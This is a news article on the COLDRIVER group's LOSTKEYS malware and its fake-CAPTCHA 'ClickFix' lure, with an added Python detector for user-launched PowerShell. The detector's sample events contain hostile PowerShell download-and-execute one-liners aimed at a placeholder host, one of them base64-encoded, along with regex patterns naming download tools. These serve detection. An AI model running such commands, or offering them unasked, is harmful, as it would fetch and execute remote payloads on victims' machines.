Russian hackers use fake CAPTCHAs to spy on high-ranking officials

9 May 2025 2 minutes Author: Newsman

A Russian hacking group known as COLDRIVER has created the LOSTKEYS malware. It uses fake CAPTCHA pages to gain access to sensitive data belonging to high-ranking officials. The new wave of attacks targets the diplomatic corps, civil servants, and public organizations.

According to Google Threat Intelligence Group (GTIG), the COLDRIVER hacker group, also tracked as UNC4057 and Star Blizzard, created the LOSTKEYS malware. The attack starts with a fake CAPTCHA on a phishing page, a link to which is usually delivered by email.

When the user tries to pass the "verification", the page instructs them to copy a PowerShell command and paste it into Windows (the Run dialog or a console). Once the command is executed, the malware starts working on the device: it looks for files with specific extensions, steals credentials, emails and contact information, and sends them to the attackers. Note that no software vulnerability is exploited here; the victim runs the payload themselves, so patching alone does not stop this technique (commonly called ClickFix), and defenders need to watch for user-launched PowerShell instead.
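The lure described above leaves a distinctive trace on the endpoint: explorer.exe (the Run dialog or Start search) spawning a script host such as PowerShell with a hidden window, an execution-policy bypass, an encoded command, or a download-and-execute one-liner. The Python below is an added example, not code from the article or from GTIG's report; it scans constructed Sysmon-style process-creation events for that pattern. The event fields, command lines and lure URLs (lure.invalid) are all made up for the demonstration, and the indicator list is an assumption about what such a lure typically contains, not a list taken from the LOSTKEYS samples.

```python
"""Flag ClickFix-style, user-launched PowerShell over constructed Sysmon
Event ID 1 (process creation) records. Added example, not the article's code."""

import base64
import re

# Script hosts a fake-CAPTCHA lure typically tells the victim to launch by hand.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe")

# Assumed indicator set; each regex is reported by name when it matches.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle|in)?\s+h(?:idden)?\b", re.I),
    "download_and_run": re.compile(
        r"iex|invoke-expression|downloadstring|downloadfile|iwr|invoke-webrequest|"
        r"invoke-restmethod|net\.webclient|curl\s+|start-bitstransfer", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form (UTF-16LE, base64) used by many lures."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict):
    """Score one process-creation event; None when no indicator matches."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    if image not in SCRIPT_HOSTS:
        return None
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + " " + decoded  # scan the decoded payload too, not just the wrapper
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded:
        hits.append("encoded_command")
    if not hits:
        return None
    # explorer.exe as parent means a human launched it (Run dialog / Start search),
    # which is exactly the path a fake-CAPTCHA lure walks the victim down.
    return {"image": image, "parent": parent, "indicators": hits,
            "decoded": decoded, "user_launched": parent == "explorer.exe"}


def clickfix_findings(events):
    """Events with indicators AND an interactive parent; other parents belong to other rules."""
    return [f for f in (analyze_event(e) for e in events) if f and f["user_launched"]]


# Constructed sample telemetry (not real logs). lure.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://lure.invalid/verify -UseBasicParsing).Content"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoP -W Hidden -EncodedCommand "
                + encode_powershell("iex (New-Object Net.WebClient).DownloadString('http://lure.invalid/c')")},
    {"parent": r"C:\Windows\explorer.exe",  # benign admin use from the Run dialog
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"'},
    {"parent": r"C:\Windows\System32\svchost.exe",  # same payload, but not user-launched
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadString(\'http://lure.invalid/s\') | iex"'},
]

if __name__ == "__main__":
    for f in clickfix_findings(SAMPLE_EVENTS):
        print(f["image"], "<-", f["parent"], f["indicators"])
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The parent-process check is the key discriminator: the same hidden-window download one-liner started by a service or scheduled task is a different problem, so the last sample is scored but excluded from the ClickFix findings. Decoding -EncodedCommand before matching matters because lures routinely hide the download-and-execute stage behind base64.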

GTIG emphasizes that these attacks are aimed at officials with access to confidential information: NATO representatives, journalists, and consultants to government agencies and non-governmental organizations. Particular attention is paid to individuals connected with Ukraine, which is consistent with the strategic goals of the Russian Federation. COLDRIVER is not a new threat: the group has long targeted government agencies, public organizations and journalists. Earlier samples were disguised as components of legitimate software such as Maltego to mask the malicious code. The most recent campaigns were recorded in April 2025, while the first samples date back to December 2023.

The emergence of LOSTKEYS and the use of fake CAPTCHAs mark a new stage in the social engineering methods used by Russian hackers. Because the victim executes the payload themselves, timely detection and blocking of the domains that host the lure pages and distribute the malicious code have become a key step in countering this threat.
